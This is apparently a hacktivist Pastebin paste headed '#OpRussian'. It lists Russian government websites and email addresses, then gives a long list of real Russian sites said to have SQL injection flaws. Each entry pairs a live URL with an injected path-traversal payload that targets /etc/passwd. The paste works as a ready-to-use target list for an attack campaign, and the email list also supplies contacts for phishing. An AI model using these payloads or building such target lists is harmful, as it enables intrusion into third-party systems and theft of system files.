Advertisement
Guest User

#OpRussian

a guest
Nov 26th, 2015
1,625
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 121.16 KB | None | 0 0
  1. ▄▄▄▄▄▄▄▄▄▄▄ ▄ ▄ ▄▄▄▄▄▄▄▄▄▄▄ ▄ ▄ ▄▄▄▄▄▄▄▄▄▄▄ ▄▄▄▄▄▄▄▄▄▄▄ ▄▄▄▄▄▄▄▄▄▄▄ ▄▄▄▄▄▄▄▄▄▄▄ ▄▄▄▄▄▄▄▄▄▄▄ ▄▄▄▄▄▄▄▄▄▄▄ ▄ ▄
  2. ▐░░░░░░░░░░░▌▐░▌ ▐░▌▐░░░░░░░░░░░▌▐░▌ ▐░▌▐░░░░░░░░░░░▌▐░░░░░░░░░░░▌▐░░░░░░░░░░░▌▐░░░░░░░░░░░▌▐░░░░░░░░░░░▌▐░░░░░░░░░░░▌▐░▌ ▐░▌
  3. ▀▀▀▀█░█▀▀▀▀ ▐░▌ ▐░▌▐░█▀▀▀▀▀▀▀█░▌▐░▌ ▐░▌ ▐░█▀▀▀▀▀▀▀▀▀ ▐░█▀▀▀▀▀▀▀▀▀ ▐░█▀▀▀▀▀▀▀▀▀ ▐░█▀▀▀▀▀▀▀█░▌ ▀▀▀▀█░█▀▀▀▀ ▀▀▀▀█░█▀▀▀▀ ▐░▌ ▐░▌
  4. ▐░▌ ▐░▌ ▐░▌▐░▌ ▐░▌▐░▌▐░▌ ▐░▌ ▐░▌ ▐░▌ ▐░▌ ▐░▌ ▐░▌ ▐░▌ ▐░▌ ▐░▌
  5. ▐░▌ ▐░▌ ▐░▌▐░█▄▄▄▄▄▄▄█░▌▐░▌░▌ ▐░█▄▄▄▄▄▄▄▄▄ ▐░█▄▄▄▄▄▄▄▄▄ ▐░▌ ▐░█▄▄▄▄▄▄▄█░▌ ▐░▌ ▐░▌ ▐░█▄▄▄▄▄▄▄█░▌
  6. ▐░▌ ▐░▌ ▐░▌▐░░░░░░░░░░░▌▐░░▌ ▐░░░░░░░░░░░▌▐░░░░░░░░░░░▌▐░▌ ▐░░░░░░░░░░░▌ ▐░▌ ▐░▌ ▐░░░░░░░░░░░▌
  7. ▐░▌ ▐░▌ ▐░▌▐░█▀▀▀▀█░█▀▀ ▐░▌░▌ ▀▀▀▀▀▀▀▀▀█░▌▐░█▀▀▀▀▀▀▀▀▀ ▐░▌ ▐░█▀▀▀▀█░█▀▀ ▐░▌ ▐░▌ ▀▀▀▀█░█▀▀▀▀
  8. ▐░▌ ▐░▌ ▐░▌▐░▌ ▐░▌ ▐░▌▐░▌ ▐░▌▐░▌ ▐░▌ ▐░▌ ▐░▌ ▐░▌ ▐░▌ ▐░▌
  9. ▐░▌ ▐░█▄▄▄▄▄▄▄█░▌▐░▌ ▐░▌ ▐░▌ ▐░▌ ▄▄▄▄▄▄▄▄▄█░▌▐░█▄▄▄▄▄▄▄▄▄ ▐░█▄▄▄▄▄▄▄▄▄ ▐░▌ ▐░▌ ▄▄▄▄█░█▄▄▄▄ ▐░▌ ▐░▌
  10. ▐░▌ ▐░░░░░░░░░░░▌▐░▌ ▐░▌▐░▌ ▐░▌▐░░░░░░░░░░░▌▐░░░░░░░░░░░▌▐░░░░░░░░░░░▌▐░▌ ▐░▌▐░░░░░░░░░░░▌ ▐░▌ ▐░▌
  11. ▀ ▀▀▀▀▀▀▀▀▀▀▀ ▀ ▀ ▀ ▀ ▀▀▀▀▀▀▀▀▀▀▀ ▀▀▀▀▀▀▀▀▀▀▀ ▀▀▀▀▀▀▀▀▀▀▀ ▀ ▀ ▀▀▀▀▀▀▀▀▀▀▀ ▀ ▀
  12.  
  13.  
  14.  
  15. 1- RUSSIAN GOVERNMENT WEBSITES LIST
  16. 2- RUSSIAN GOVERNMENT E-MAILS LIST
  17. 3- WEBSITES THAT HAVE SQL INJECTION VULNERABILITY
  18. 4- WEBSITES THAT HAVE XSS VULNERABILITY
  19. 5- RUSSIAN ALEXA TOP WEBSITES NMAP PING
  20.  
  21.  
  22.  
  23. ****--------------------------****
  24. *** RUSSIAN GOVERNMENT WEBSITES ***
  25. ****--------------------------****
  26.  
  27. http://government.ru/en/
  28. http://www.genproc.gov.ru/
  29. http://www.fas.gov.ru/
  30. http://msu.gov.ru/
  31. http://www.tambov.gov.ru/
  32. http://www.fish.gov.ru/
  33. http://fsa.gov.ru/
  34. http://saratov.gov.ru/
  35. http://www.fadm.gov.ru/
  36. http://economy.gov.ru/
  37. https://torgi.gov.ru/
  38. http://www.oborona.gov.ru/
  39. http://www.mnr.gov.ru/
  40. http://www.zspk.gov.ru/
  41. http://mon.gov.ru/
  42. http://rkn.gov.ru/
  43. http://www.council.gov.ru/
  44. http://gvp.gov.ru/
  45. https://sevastopol.gov.ru/
  46. http://www.minkavkaz.gov.ru/
  47. http://www.ved.gov.ru/
  48. http://www.obrnadzor.gov.ru/
  49. http://www.fskn.gov.ru/
  50. http://tomsk.gov.ru/
  51. http://www.chechnya.gov.ru/
  52. http://minenergo.gov.ru/
  53. http://www.mchs.gov.ru/
  54. http://pravo.gov.ru/
  55. https://regulation.gov.ru/
  56. http://ufo.gov.ru/
  57. https://www.mnr.gov.ru/news/
  58.  
  59. ****--------------------------****
  60. *** RUSSIAN GOVERNMENT E-MAILS ***
  61. ****--------------------------****
  62.  
  63. www@tambov.gov.ru
  64. info@fsa.gov.ru
  65. 72webmaster@saratov.gov.ru
  66. webmaster@zspk.gov.ru
  67. webmaster@rkn.gov.ru
  68. help@kaidev.ru
  69. divenkomp@minenergo.gov.ru
  70.  
  71.  
  72.  
  73. ***********************************************
  74. ********* SQL INJECTION VULNERABILITY *********
  75. ***********************************************
  76.  
  77. Type: SQL Injection
  78. Protocol: http
  79. Verb: get
  80. Parameter: kat2n
  81. Vulnerability URL: http://1-soft.ru/kat.php?kat2n=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%23--%27%40%21%5C&l=20
  82.  
  83.  
  84. Type: SQL Injection
  85. Protocol: http
  86. Verb: get
  87. Parameter: l
  88. Vulnerability URL: http://1-soft.ru/kat.php?kat2n=2081240247&l=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%23--%27%40%21%5C
  89.  
  90.  
  91. Type: SQL Injection
  92. Protocol: http
  93. Verb: get
  94. Parameter: bn
  95. Vulnerability URL: http://alltizer.ru/tizers.php?char=2&bn=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%23--%27%40%21%5C&cat=10&ad=0&sid=3191
  96.  
  97.  
  98. Type: SQL Injection
  99. Protocol: http
  100. Verb: get
  101. Parameter: picture
  102. Vulnerability URL: http://auto.potrebitel.ru/pic.php?table=award_list&unique=awd_id&id=3&picture=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%23--%27%40%21%5C
  103.  
  104.  
  105. Type: SQL Injection
  106. Protocol: http
  107. Verb: get
  108. Parameter: unique
  109. Vulnerability URL: http://auto.potrebitel.ru/pic.php?table=award_list&unique=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%23--%27%40%21%5C&id=3&picture=awd_image
  110.  
  111.  
  112. Type: SQL Injection
  113. Protocol: http
  114. Verb: get
  115. Parameter: table
  116. Vulnerability URL: http://auto.potrebitel.ru/pic.php?table=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%23--%27%40%21%5C&unique=awd_id&id=3&picture=awd_image
  117.  
  118.  
  119. Type: SQL Injection
  120. Protocol: http
  121. Verb: get
  122. Parameter: btotal
  123. Vulnerability URL: http://ask.duediligencellc.ru/adpeeps.php?lcolor=499f4c&ver=2.0&uid=100000&bfunction=showad&bsize=text&bmode=off&btype=3&bborder=0&bstyle=google-short&bpos=default&tcolor=0000FF&btarget=_blank&textcolor=000000&bzone=default&btotal=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%23--%27%40%21%5C
  124.  
  125.  
  126. Type: SQL Injection
  127. Protocol: http
  128. Verb: get
  129. Parameter: name
  130. Vulnerability URL: http://9may.maly.ru/pages.php?name=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%23--%27%40%21%5C
  131.  
  132.  
  133. Type: SQL Injection
  134. Protocol: http
  135. Verb: get
  136. Parameter: auto
  137. Vulnerability URL: http://alians-auto.ru/show_auto.php?auto=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%23--%27%40%21%5C
  138.  
  139.  
  140. Type: SQL Injection
  141. Protocol: http
  142. Verb: get
  143. Parameter: id
  144. Vulnerability URL: http://alvet.ru/v_article.php?id=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%23--%27%40%21%5C
  145.  
  146.  
  147. Type: SQL Injection
  148. Protocol: http
  149. Verb: get
  150. Parameter: num
  151. Vulnerability URL: http://academy-health.ru/napravlenie.php?info=108&num=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%23--%27%40%21%5C
  152.  
  153.  
  154. Type: SQL Injection
  155. Protocol: http
  156. Verb: get
  157. Parameter: subinfo
  158. Vulnerability URL: http://academy-health.ru/napravlenie.php?info=82&subinfo=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%23--%27%40%21%5C&num=44
  159.  
  160.  
  161. Type: SQL Injection
  162. Protocol: http
  163. Verb: get
  164. Parameter: info
  165. Vulnerability URL: http://academy-health.ru/napravlenie.php?info=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%23--%27%40%21%5C&num=44
  166.  
  167.  
  168. Type: SQL Injection
  169. Protocol: http
  170. Verb: get
  171. Parameter: num
  172. Vulnerability URL: http://academy-health.ru/napravlenie.php?info=82&subinfo=55&num=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%23--%27%40%21%5C
  173.  
  174.  
  175. Type: SQL Injection
  176. Protocol: http
  177. Verb: get
  178. Parameter: info
  179. Vulnerability URL: http://academy-health.ru/napravlenie.php?info=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%23--%27%40%21%5C&subinfo=55&num=44
  180.  
  181.  
  182. Type: SQL Injection
  183. Protocol: http
  184. Verb: get
  185. Parameter: cid
  186. Vulnerability URL: http://autodaynews.ru/cat.php?cid=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%23--%27%40%21%5C
  187.  
  188.  
  189. Type: SQL Injection
  190. Protocol: http
  191. Verb: get
  192. Parameter: pid
  193. Vulnerability URL: http://avtokorel.ru/?pid=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%23--%27%40%21%5C
  194.  
  195.  
  196. Type: SQL Injection
  197. Protocol: http
  198. Verb: get
  199. Parameter: theme
  200. Vulnerability URL: http://blog.whitemonkeys.ru/index.php?theme=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%23--%27%40%21%5C
  201.  
  202.  
  203. Type: SQL Injection
  204. Protocol: http
  205. Verb: get
  206. Parameter: id
  207. Vulnerability URL: http://bosny.ru/product_info.php?id=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%23--%27%40%21%5C
  208.  
  209.  
  210. Type: SQL Injection
  211. Protocol: http
  212. Verb: get
  213. Parameter: id
  214. Vulnerability URL: http://braintension.ru/question.php?id=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%23--%27%40%21%5C
  215.  
  216.  
  217. Type: SQL Injection
  218. Protocol: http
  219. Verb: get
  220. Parameter: table
  221. Vulnerability URL: http://byt.potrebitel.ru/pic.php?table=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%23--%27%40%21%5C&unique=gud_id&id=3429&picture=gud_image
  222.  
  223.  
  224. Type: SQL Injection
  225. Protocol: http
  226. Verb: get
  227. Parameter: picture
  228. Vulnerability URL: http://byt.potrebitel.ru/pic.php?table=good_list&unique=gud_id&id=3429&picture=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%23--%27%40%21%5C
  229.  
  230.  
  231. Type: SQL Injection
  232. Protocol: http
  233. Verb: get
  234. Parameter: unique
  235. Vulnerability URL: http://byt.potrebitel.ru/pic.php?table=good_list&unique=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%23--%27%40%21%5C&id=3429&picture=gud_image
  236.  
  237.  
  238. Type: SQL Injection
  239. Protocol: http
  240. Verb: get
  241. Parameter: id
  242. Vulnerability URL: http://chelyab.ru/top?do=in&id=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%23--%27%40%21%5C
  243.  
  244.  
  245. Type: SQL Injection
  246. Protocol: http
  247. Verb: get
  248. Parameter: mtypeid
  249. Vulnerability URL: http://child-toys.ru/view_catalog.php?mtypeid=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%23--%27%40%21%5C
  250.  
  251.  
  252. Type: SQL Injection
  253. Protocol: http
  254. Verb: get
  255. Parameter: id
  256. Vulnerability URL: http://comp-car.ru/prodact.php?id=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%23--%27%40%21%5C
  257.  
  258.  
  259. Type: SQL Injection
  260. Protocol: http
  261. Verb: get
  262. Parameter: m
  263. Vulnerability URL: http://computerra.tomsk.ru/index.phtml?a=836&f=1&m=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%23--%27%40%21%5C&p=archive&w=5&y=2004&sa=1
  264.  
  265.  
  266. Type: SQL Injection
  267. Protocol: http
  268. Verb: get
  269. Parameter: a
  270. Vulnerability URL: http://computerra.tomsk.ru/index.phtml?a=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%23--%27%40%21%5C&f=1&m=4&p=archive&w=5&y=2004&sa=1
  271.  
  272.  
  273. Type: SQL Injection
  274. Protocol: http
  275. Verb: get
  276. Parameter: razdel_id
  277. Vulnerability URL: http://dariosalas.ru/?razdel_id=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%23--%27%40%21%5C
  278.  
  279.  
  280. Type: SQL Injection
  281. Protocol: http
  282. Verb: get
  283. Parameter: cat
  284. Vulnerability URL: http://darling-toy.ru/index.php?module=shop&cat=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%23--%27%40%21%5C
  285.  
  286.  
  287. Type: SQL Injection
  288. Protocol: http
  289. Verb: get
  290. Parameter: Itemid
  291. Vulnerability URL: http://deutscherklub.ru/index.php?Itemid=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%23--%27%40%21%5C&task=view&option=com_content&id=40
  292.  
  293.  
  294. Type: SQL Injection
  295. Protocol: http
  296. Verb: get
  297. Parameter: id
  298. Vulnerability URL: http://deutscherklub.ru/index.php?Itemid=1&task=view&option=com_content&id=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%23--%27%40%21%5C
  299.  
  300.  
  301. Type: SQL Injection
  302. Protocol: http
  303. Verb: get
  304. Parameter: option
  305. Vulnerability URL: http://deutscherklub.ru/index.php?Itemid=1&task=view&option=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%23--%27%40%21%5C&id=40
  306.  
  307.  
  308. Type: SQL Injection
  309. Protocol: http
  310. Verb: get
  311. Parameter: IDcatalog
  312. Vulnerability URL: http://digital.tomsk.ru/?ItemID=981225&IDcatalog=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%23--%27%40%21%5C
  313.  
  314.  
  315. Type: SQL Injection
  316. Protocol: http
  317. Verb: get
  318. Parameter: id
  319. Vulnerability URL: http://elizarovopark.ru/article.html?id=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%23--%27%40%21%5C
  320.  
  321.  
  322. Type: SQL Injection
  323. Protocol: http
  324. Verb: get
  325. Parameter: id
  326. Vulnerability URL: http://encycl.anthropology.ru/article.php?id=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%23--%27%40%21%5C
  327.  
  328.  
  329. Type: SQL Injection
  330. Protocol: http
  331. Verb: get
  332. Parameter: id_refer
  333. Vulnerability URL: http://eng.trafficland.ru/?id_refer=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%23--%27%40%21%5C
  334.  
  335.  
  336. Type: SQL Injection
  337. Protocol: http
  338. Verb: get
  339. Parameter: pg
  340. Vulnerability URL: http://english.smolovich.ru/?pg=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%23--%27%40%21%5C
  341.  
  342.  
  343. Type: SQL Injection
  344. Protocol: http
  345. Verb: get
  346. Parameter: lang
  347. Vulnerability URL: http://evroplast-paket.spb.ru/index.php?lang=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%23--%27%40%21%5C
  348.  
  349.  
  350. Type: SQL Injection
  351. Protocol: http
  352. Verb: get
  353. Parameter: pid
  354. Vulnerability URL: http://evrostroi-plus.ru/gallery?pid=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%23--%27%40%21%5C
  355.  
  356.  
  357. Type: SQL Injection
  358. Protocol: http
  359. Verb: get
  360. Parameter: city_id
  361. Vulnerability URL: http://expo.peterlife.ru/ru?city_id=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%23--%27%40%21%5C&country_id=45
  362.  
  363.  
  364. Type: SQL Injection
  365. Protocol: http
  366. Verb: get
  367. Parameter: _file
  368. Vulnerability URL: http://family.ru/index.phpmezhdunarodnyi_festival_klounov_10082010.html?_type=inl&_file=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%23--%27%40%21%5C&_path=theatre
  369.  
  370.  
  371. Type: SQL Injection
  372. Protocol: http
  373. Verb: get
  374. Parameter: _file
  375. Vulnerability URL: http://family.ru/index.phppanika_07092010.html?_type=inl&_file=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%23--%27%40%21%5C&_path=theatre
  376.  
  377.  
  378. Type: SQL Injection
  379. Protocol: http
  380. Verb: get
  381. Parameter: _file
  382. Vulnerability URL: http://family.ru/index.phpcpm_01032010.html?_type=inl&_file=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%23--%27%40%21%5C&_path=style_and_fashion
  383.  
  384.  
  385. Type: SQL Injection
  386. Protocol: http
  387. Verb: get
  388. Parameter: _file
  389. Vulnerability URL: http://family.ru/index.phpsecrety_zorro_06092010.html?_type=inl&_file=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%23--%27%40%21%5C&_path=theatre
  390.  
  391.  
  392. Type: SQL Injection
  393. Protocol: http
  394. Verb: get
  395. Parameter: _file
  396. Vulnerability URL: http://family.ru/index.phpne_brat_zhivym_04032010.html?_type=inl&_file=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%23--%27%40%21%5C&_path=cinema_and_tv
  397.  
  398.  
  399. Type: SQL Injection
  400. Protocol: http
  401. Verb: get
  402. Parameter: _file
  403. Vulnerability URL: http://family.ru/index.phpchristmas_time_02092010.html?_type=inl&_file=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%23--%27%40%21%5C&_path=exhibitions
  404.  
  405.  
  406. Type: SQL Injection
  407. Protocol: http
  408. Verb: get
  409. Parameter: _file
  410. Vulnerability URL: http://family.ru/index.phpshagom_farshmsk_12022010.html?_type=inl&_file=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%23--%27%40%21%5C&_path=theatre
  411.  
  412.  
  413. Type: SQL Injection
  414. Protocol: http
  415. Verb: get
  416. Parameter: _file
  417. Vulnerability URL: http://family.ru/index.phpgor_chahal_26082010.html?_type=inl&_file=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%23--%27%40%21%5C&_path=exhibitions
  418.  
  419.  
  420. Type: SQL Injection
  421. Protocol: http
  422. Verb: get
  423. Parameter: _file
  424. Vulnerability URL: http://family.ru/index.phpkostya_chzu_24042009.html?_type=inl&_file=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%23--%27%40%21%5C&_path=style_and_fashion
  425.  
  426.  
  427. Type: SQL Injection
  428. Protocol: http
  429. Verb: get
  430. Parameter: _file
  431. Vulnerability URL: http://family.ru/index.phpterritory_2010_mos_ber_18082010.html?_type=inl&_file=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%23--%27%40%21%5C&_path=theatre
  432.  
  433.  
  434. Type: SQL Injection
  435. Protocol: http
  436. Verb: get
  437. Parameter: list
  438. Vulnerability URL: http://forum.art-mir.ru/?theme=7705&list=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%23--%27%40%21%5C
  439.  
  440.  
  441. Type: SQL Injection
  442. Protocol: http
  443. Verb: get
  444. Parameter: p
  445. Vulnerability URL: http://forum.icqbots.ru/viewtopic.php?p=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%23--%27%40%21%5C
  446.  
  447.  
  448. Type: SQL Injection
  449. Protocol: http
  450. Verb: get
  451. Parameter: board
  452. Vulnerability URL: http://forum.insk.ru/index.php?action=display&prev_next=prev&board=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%23--%27%40%21%5C&threadid=694
  453.  
  454.  
  455. Type: SQL Injection
  456. Protocol: http
  457. Verb: get
  458. Parameter: t
  459. Vulnerability URL: http://forum.intoks.ru/viewtopic.php?t=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%23--%27%40%21%5C
  460.  
  461.  
  462. Type: SQL Injection
  463. Protocol: http
  464. Verb: get
  465. Parameter: type
  466. Vulnerability URL: http://forum.php-myadmin.ru/extern.php?action=feed&type=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%23--%27%40%21%5C
  467.  
  468.  
  469. Type: SQL Injection
  470. Protocol: http
  471. Verb: get
  472. Parameter: menu2
  473. Vulnerability URL: http://frontkit.spb.ru/index.php?menu2=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%23--%27%40%21%5C&menu1=1
  474.  
  475.  
  476. Type: SQL Injection
  477. Protocol: http
  478. Verb: get
  479. Parameter: menu1
  480. Vulnerability URL: http://frontkit.spb.ru/index.php?menu2=22&menu1=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%23--%27%40%21%5C
  481.  
  482.  
  483. Type: SQL Injection
  484. Protocol: http
  485. Verb: get
  486. Parameter: plang
  487. Vulnerability URL: http://hinterland.krc.karelia.ru/index.php?plang=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%23--%27%40%21%5C
  488.  
  489.  
  490. Type: SQL Injection
  491. Protocol: http
  492. Verb: get
  493. Parameter: id
  494. Vulnerability URL: http://hitlog.spb.ru/showhits.php?id=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%23--%27%40%21%5C&st=img
  495.  
  496.  
  497. Type: SQL Injection
  498. Protocol: http
  499. Verb: get
  500. Parameter: nid
